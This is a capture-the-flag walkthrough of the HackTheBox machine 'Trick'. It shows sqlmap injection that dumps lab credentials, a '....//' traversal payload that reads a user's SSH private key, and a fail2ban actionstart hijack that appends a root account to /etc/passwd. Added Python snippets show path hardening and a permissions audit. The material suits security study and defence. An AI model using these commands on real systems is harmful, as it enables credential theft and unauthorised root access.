# Trick

## Nmap

```
sudo nmap 10.10.11.166 -p- -sS -sV

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
25/tcp open  smtp    Postfix smtpd
53/tcp open  domain  ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
80/tcp open  http    nginx 1.14.2
Service Info: Host:  debian.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### DNS

Starting out on DNS, we add 10.10.11.166 to our attacking system's secondary DNS servers. Performing a zone transfer with `dig` reveals the sub-domains `root.trick.htb` and `preprod-payroll.trick.htb`.

```
dig AXFR 'trick.htb' @10.10.11.166
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FOU8xVQaTBJUqOVxRlzBG%2Fimage.png?alt=media\&token=df190e7d-d08a-4eaa-8478-3a9cf6bb8660)

**Note:** Add these into `/etc/hosts`.

Browsing to <http://preprod-payroll.trick.htb> reveals the following login prompt.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FUcikubO7NioZn9DBxw81%2Fimage.png?alt=media\&token=cd5a392d-3d07-455d-9a5a-b80d9f4333da)

Performing directory enumeration with `dirsearch` reveals the `/user.php` page.

```
dirsearch -u http://preprod-payroll.trick.htb -w /usr/share/seclists/Discovery/Web-Content/Common-PHP-Filenames.txt
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FTO2UGpm9w98v1vPXonOo%2Fimage.png?alt=media\&token=0b6ce7e6-b85c-4e26-80d0-7030467d280a)

Viewing the page, we find the username *Enemigosss*. The page buttons are not actionable.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F1zCVlD3WeGy56mmYkNqL%2Fimage.png?alt=media\&token=721a61dd-2b0b-4e9e-958a-05ece471b9b6)

Viewing the page source reveals some code that indicates parameters we can use.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FryOPJ4z0oRawQPSgtcHF%2Fimage.png?alt=media\&token=6bdc4ec6-486a-437d-8c51-226c9703a98f)

Testing the `page` parameter takes us to a new page; however, we are unable to do anything further of use with it.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FlJJLOh5YFP9FekEjC9BS%2Fimage.png?alt=media\&token=4214e3a7-85d6-42c8-b63d-6abadf400091)

The `id=n` parameter could be susceptible to SQL injection, so we fire up `sqlmap` and pass in the URL with the parameter.

Running through with the `--batch` and `--tables` parameters, we are shown the `users` table in the `payroll_db` database.

```
sqlmap -u 'http://preprod-payroll.trick.htb/manage_user.php?id=1' --batch --tables
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FColxV5eilh2s8bDVNozi%2Fimage.png?alt=media\&token=cae22d95-c4ca-4edf-bbae-b49ac0b60386)

We can then dump the contents of the users table.

```
sqlmap -u 'http://preprod-payroll.trick.htb/manage_user.php?id=1' --batch -T users --dump 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FpNSlkDyxL8g0xX4YhJfj%2Fimage.png?alt=media\&token=2af7811f-bdc6-4e78-90b9-b02e28c28252)

This reveals the following credentials: `Enemigosss:SuperGucciRainbowCake`

Going back to the login page on <http://preprod-payroll.trick.htb> we are able to proceed with the given credentials.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FaoAxQ7shKv6U8DUPP83c%2Fimage.png?alt=media\&token=344c3ea8-8f30-4ebe-b232-0a8e336896d2)

We find that none of the pages provide any interesting information, so we use `wfuzz` to fuzz for further pages.

```bash
wfuzz -b 'PHPSESSID=j7d96ocnncnp9pajveb9eqlqsg' -u "http://preprod-payroll.trick.htb/index.php?page=FUZZ" -w /usr/share/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt --hw 504 -c
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fvs1lqPAFTbDNB184ddMA%2Fimage.png?alt=media\&token=2dfee630-c75f-4fc9-bbf3-c3c83493cc7f)

Finding the page <http://preprod-payroll.trick.htb/index.php?page=site_settings> we are presented with an opportunity for file upload. However, I was not able to get this working. Viewing the requests through a proxy shows our working user does not have permission for file upload.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fp3LY6twGq9h5CBqHxI1L%2Fimage.png?alt=media\&token=bb250da5-6638-4ee1-be43-31f37af37295)

Looking again at the subdomain `preprod-payroll`, we can fuzz for other potential virtual hosts by replacing the word "payroll" with entries from a wordlist, which identifies "marketing".

```
wfuzz -c -f sub-fighter -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u "http://trick.htb" -H "Host: preprod-FUZZ.trick.htb" --hl 83 -v
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F54p2ldR1bX82FHbCVH8a%2Fimage.png?alt=media\&token=e1b885a0-88f5-40a6-8453-df913500c920)

Adding `preprod-marketing.trick.htb` to our hosts file, we browse to the domain and find an additional site.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FQRUsR02Jmo1qFV7JOJhz%2Fimage.png?alt=media\&token=4cc98cd1-a0ee-4d21-b2ab-e9906c054225)

Going through the available pages, we find the parameter in `/index.php?page=services.html` can likely be fuzzed for further pages or maybe even LFI.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F39IQbAARezixsv5sPxgx%2Fimage.png?alt=media\&token=757fd33c-17f5-4045-af7d-949abc9423a6)

Checking for LFI:

```
wfuzz -u "http://preprod-marketing.trick.htb/index.php?page=FUZZ" -w ~/Desktop/lfi_linux.txt --hl 0
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FFw2JVd9F79dRZpck8UZc%2Fimage.png?alt=media\&token=09d7b956-2647-4a3e-851b-730610621a34)

We get various hits for filter bypasses that read `/etc/passwd`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FRduVcfHHYPQsIJj1OFOP%2Fimage.png?alt=media\&token=82a83687-0520-4706-8dbe-fef70b299041)

Seeing that the user `michael` exists on the target system, we fuzz for well-known files and get a hit for the `id_rsa` SSH key.

```
curl 'http://preprod-marketing.trick.htb/index.php?page=....//....//....//....//....//....//....//....//....//....//....//home/michael/.ssh/id_rsa'
```
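The `....//` payload above works against filters that strip `../` once and then include whatever is left. The following added example (not from the original write-up; the web root `/var/www/html` is an assumption) contrasts that single-pass filter with a check on the fully resolved path:

```python
import os
from typing import Optional

# Constructed values: assumed web root and the traversal pattern used above.
WEB_ROOT = "/var/www/html"
PAYLOAD = "....//" * 4 + "home/michael/.ssh/id_rsa"


def naive_strip(page: str) -> str:
    """Single-pass removal of '../': the filter that '....//' defeats, because
    stripping the middle '../' out of '....//' leaves a fresh '../' behind."""
    return page.replace("../", "")


def resolve_naive(base: str, page: str) -> str:
    """The path a vulnerable include ends up opening after the naive filter."""
    return os.path.normpath(os.path.join(base, naive_strip(page)))


def resolve_hardened(base: str, page: str) -> Optional[str]:
    """Resolve the request and reject anything outside base.

    Works on the final resolved path, so the number or encoding of '../'
    segments is irrelevant; an absolute page (which os.path.join would let
    replace base) is rejected the same way. Returns None on rejection."""
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base_real, page))
    if os.path.commonpath([base_real, candidate]) != base_real:
        return None
    return candidate


if __name__ == "__main__":
    print("naive   :", resolve_naive(WEB_ROOT, PAYLOAD))
    print("hardened:", resolve_hardened(WEB_ROOT, "../../../../home/michael/.ssh/id_rsa"))
```

With the naive filter the four `....//` segments collapse to `../../../../` and the include climbs out of the web root; the hardened check returns `None` for the same destination.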

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Frrcjt3Pxcrd66QPOGkmn%2Fimage.png?alt=media\&token=5d39fc22-d356-4ba3-8d6b-03134dda7b4f)

Copy the contents into `id_rsa` and use `chmod` to set the appropriate permissions. We are then able to SSH into the target system.

```
sudo chmod 600 id_rsa
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fw0ZtZKuqexCgS9bSz5YB%2Fimage.png?alt=media\&token=c6bea6dd-9317-4423-9ff0-c946e2895464)

Grabbing the `user.txt` flag.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FzZvPiCnsuuMwUm2KvdRV%2Fimage.png?alt=media\&token=5853b2c1-9953-4a98-8d68-837a16c89ac3)

Checking sudo permissions with `sudo -l`, we see we have the ability to restart the `fail2ban` service as root without specifying the root password.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FQFTl0XSfEXSARgaxEbu5%2Fimage.png?alt=media\&token=83817c39-788c-4c65-9167-823616ca5595)

Some research into privilege escalation with fail2ban shows that the ability to edit the `iptables-multiport.conf` file presents an opportunity for privilege escalation.

{% embed url="https://youssef-ichioui.medium.com/abusing-fail2ban-misconfiguration-to-escalate-privileges-on-linux-826ad0cdafb7" %}

The user *michael* has write permissions on the directory `/etc/fail2ban/action.d`, which means we can replace files within the directory with our own, even though the files themselves are owned by root.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FmHxKXT3XA3YZ3aHyEekc%2Fimage.png?alt=media\&token=d7679f61-05c7-4b89-af0c-3be74dc1a17d)

First off, copy the current contents of `iptables-multiport.conf` and make the appropriate changes. Below we are setting the command to create a new root user (`uid 0`) with the password `Password123`.

```bash
echo 'viper:$1$luDZJMtq$4ljcR6cSb41FraIUQIiQx/:0:0:viper:/home/viper:/bin/bash' >> /etc/passwd
```

The command is placed under `actionstart`, which runs the given command when the service starts.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FNsAec18U1muv5z1FBRuS%2Fimage.png?alt=media\&token=f403eb8c-1917-4689-ac12-ac1aeb36caf9)

The following commands then need to be executed in quick succession, as the directory is reset often.

```bash
# Run from /etc/fail2ban/action.d

# Delete the current iptables-multiport.conf (answer the prompt with y)
echo y | rm iptables-multiport.conf

# Create a new file
touch iptables-multiport.conf

# Open an editor
nano iptables-multiport.conf
```

Copy the preconfigured `iptables-multiport.conf` we created earlier into the configuration file and save.

```bash
# Restart fail2ban
sudo -u root /etc/init.d/fail2ban restart
```

Wait a short while, then check `/etc/passwd`; we should see our new user.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FlavvPz1udcbqbzj0CiR2%2Fimage.png?alt=media\&token=8fefc8e8-5080-4aa1-bc8b-8c5fbb80aaff)

We can then use `su` to switch to our new root user. For some unknown reason, during the process of changing user I was moved directly to the root user. No complaints...

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FdvDVZDtNcGebz78WeflI%2Fimage.png?alt=media\&token=374f6080-b1fd-4de7-a0b6-b8bd333d4cd9)
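The escalation above needs two things: a sudo rule that restarts fail2ban as root, and an `action.d` directory a low-privileged user can write to, so that an `actionstart` line of their choosing runs on the next restart. The following added audit script (not from the original write-up; the default directory path and the list of suspicious strings are assumptions) flags both the directory permissions and action lines that do something other than firewall setup:

```python
import os
import stat
from pathlib import Path
from typing import List

ACTION_DIR = Path("/etc/fail2ban/action.d")  # assumed Debian default location
# Constructed list: strings that have no place in a firewall action command.
SUSPICIOUS = ("/etc/passwd", "/etc/shadow", "/etc/sudoers", ">>")


def group_or_world_writable(st: os.stat_result) -> bool:
    # Check mode bits rather than os.access(): the latter always says yes for root.
    return bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_action_dir(action_dir: Path = ACTION_DIR) -> List[str]:
    """Return findings as strings; an empty list means nothing was flagged."""
    findings: List[str] = []
    if not action_dir.is_dir():
        return [f"{action_dir}: missing or not a directory"]
    st = action_dir.stat()
    if st.st_uid != 0:
        findings.append(f"{action_dir}: directory not owned by root (uid {st.st_uid})")
    if group_or_world_writable(st):
        # Directory write access is enough: rm + recreate defeats root-owned files.
        findings.append(f"{action_dir}: directory is group/world writable")
    for conf in sorted(action_dir.glob("*.conf")):
        cst = conf.stat()
        if cst.st_uid != 0 or group_or_world_writable(cst):
            findings.append(f"{conf.name}: writable by non-root "
                            f"(uid {cst.st_uid}, mode {oct(cst.st_mode & 0o777)})")
        # Flag actionstart/actionban/... lines that touch anything suspicious.
        for lineno, line in enumerate(conf.read_text(errors="replace").splitlines(), 1):
            key = line.split("=", 1)[0].strip()
            if key.startswith("action") and any(s in line for s in SUSPICIOUS):
                findings.append(f"{conf.name}:{lineno}: suspicious {key} line: {line.strip()}")
    return findings


if __name__ == "__main__":
    for finding in audit_action_dir() or ["no findings"]:
        print(finding)
```

Pair this with a review of `sudo -l` output: once `action.d` is root-owned and mode 755, a rule allowing a service restart is no longer a path to root via this file.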
